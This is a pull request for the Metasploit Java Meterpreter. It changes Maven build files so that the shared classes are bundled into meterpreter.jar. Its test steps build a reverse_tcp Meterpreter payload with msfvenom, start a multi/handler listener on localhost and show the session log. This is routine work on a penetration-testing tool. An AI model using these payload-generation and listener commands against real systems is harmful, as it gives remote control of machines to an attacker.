### PR TITLE
include shared classes inside java meterpreter jar

### DIFF
--- a/java/androidpayload/library/pom.xml
+++ b/java/androidpayload/library/pom.xml
@@ -26,6 +26,7 @@
 			<groupId>com.metasploit</groupId>
 			<artifactId>Metasploit-Java-Meterpreter</artifactId>
 			<version>${project.version}</version>
+			<scope>provided</scope>
 		</dependency>
 		<dependency>
 			<groupId>com.metasploit</groupId>
@@ -140,7 +141,6 @@
 											<arg value="--dex" />
 											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.jar" />
 											<arg value="${project.basedir}/target/dx/meterpreter" />
-											<arg value="${com.metasploit:Metasploit-Java-Shared:jar}" />
 											<arg value="${com.metasploit:Metasploit-Java-Meterpreter:jar}" />
 											<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
 											<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
@@ -153,7 +153,6 @@
 											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.dex" />
 											<arg value="${project.basedir}/../app/target/classes" />
 											<arg value="${project.basedir}/target/dx/meterpreter" />
-											<arg value="${com.metasploit:Metasploit-Java-Shared:jar}" />
 											<arg value="${com.metasploit:Metasploit-Java-Meterpreter:jar}" />
 											<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
 											<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />

--- a/java/meterpreter/meterpreter/pom.xml
+++ b/java/meterpreter/meterpreter/pom.xml
@@ -25,6 +25,29 @@
 	</dependencies>
 	<build>
 		<finalName>meterpreter</finalName>
+		<plugins>
+			<plugin>
+				<groupId>org.apache.maven.plugins</groupId>
+				<artifactId>maven-shade-plugin</artifactId>
+				<version>2.4.3</version>
+				<executions>
+					<execution>
+						<phase>package</phase>
+						<goals>
+							<goal>shade</goal>
+						</goals>
+						<configuration>
+							<createDependencyReducedPom>false</createDependencyReducedPom>
+							<artifactSet>
+								<includes>
+									<include>com.metasploit:Metasploit-Java-Shared</include>
+								</includes>
+							</artifactSet>
+						</configuration>
+					</execution>
+				</executions>
+			</plugin>
+		</plugins>
 	</build>
 	<profiles>
 		<profile>


### PR DESCRIPTION
This fixes the java meterpreter by ensuring the shared classes (ConfigParser.class, etc) are included inside meterpreter.jar.
Apologies!
To test:
```
./msfvenom -p java/meterpreter/reverse_tcp LHOST=localhost LPORT=4444 -o met.jar
./msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost localhost; set lport 4444; set ExitOnSession false; run -j"
java -jar met.jar
```
Before:
```
[*] Sending stage (46918 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:43262) at 2016-10-16 00:17:31 +0800
[-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 1 closed.
```
